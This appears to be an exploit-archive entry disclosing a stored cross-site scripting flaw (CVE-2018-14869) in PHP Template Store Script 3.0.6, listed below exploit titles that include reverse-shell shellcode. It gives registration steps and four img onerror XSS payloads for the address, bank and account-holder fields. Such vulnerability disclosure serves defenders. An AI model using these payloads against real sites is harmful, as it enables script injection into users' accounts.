3aca47020d
10 changes to exploits/shellcodes FTPShell Client 5.24 - Add to Favorites Buffer Overflow FTPShell Client 5.24 - 'Add to Favorites' Buffer Overflow FTPShell Client 5.24 - Create NewFolder Local Buffer Overflow FTPShell Client 5.24 - 'Create NewFolder' Local Buffer Overflow Wedding Slideshow Studio 1.36 - Buffer Overflow Linux Kernel - UDP Fragmentation Offset 'UFO' Privilege Escalation (Metasploit) Chartered Accountant : Auditor Website 2.0.1 - Cross-Site Scripting Auditor Website 2.0.1 - Cross-Site Scripting Basic B2B Script 2.0.0 - Cross-Site Scripting Entrepreneur Job Portal Script 3.0.1 - Cross-Site Scripting PHP Template Store Script 3.0.6 - Cross-Site Scripting Vuze Bittorrent Client 5.7.6.0 - SSDP Processing XML External Entity Injection Plex Media Server 1.13.2.5154 - SSDP Processing XML External Entity Injection cgit < 1.2.1 - 'cgit_clone_objects()' Directory Traversal Linux/x86 - Reverse TCP (::FFFF:192.168.1.5:4444/TCP) Shell (/bin/sh) + Null-Free + IPv6 Shellcode (86 bytes) Linux/ARM - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (128 Bytes)
32 lines
No EOL
1.5 KiB
Text
32 lines
No EOL
1.5 KiB
Text
*******************************************************************************************
|
|
# Exploit Title: PHP Template Store Script- 3.0.6 - Stored XSS via Addres ,Bank Name,and A/c Holder Name
|
|
# Date: 02.08.2018
|
|
# Site Titel : Exclusive Scripts
|
|
# Vendor Homepage: https://www.phpscriptsmall.com/
|
|
# Software Link: http://www.exclusivescript.com/
|
|
# Category: Web Application
|
|
# Version: 3.0.6
|
|
# Exploit Author: Sarafraz Khan
|
|
# Contact: https://www.facebook.com/sarfraj.khan.79
|
|
# Web: https://goglequeens.com
|
|
# Tested on: Windows 10 -Firefox
|
|
# CVE-2018-14869
|
|
*****************************************************************************************
|
|
|
|
Proof of Concept:-
|
|
--------------------------
|
|
1. Go to the site ( http://www.server.com/ ) .
|
|
2- Click on => Login => Register => and then fill the Form and click on Register Now
|
|
3-Goto your mail and Verify it.
|
|
4-Now come back to site and Sign in using your Verified mail and Password.
|
|
5-Goto Setting => Personal information and paste these code in
|
|
Address line 1 => "><img src=x onerror=prompt(/SARAFRAZ/)>
|
|
Address Line 2 => "><img src=x onerror=prompt(/KHAN/)>
|
|
Bank name => "><img src=x onerror=prompt(/KING/)>
|
|
A/C Holder name => "><img src=x onerror=prompt(/GOOGLEQUEENS/)>
|
|
|
|
and then click on Update Profile.
|
|
|
|
6-Now You will having popup of /SARAFRAZ/ , /KHAN/ , / KING/ and /GOOGLEQUEENS/ in you account..
|
|
|
|
*************************************************************************************** |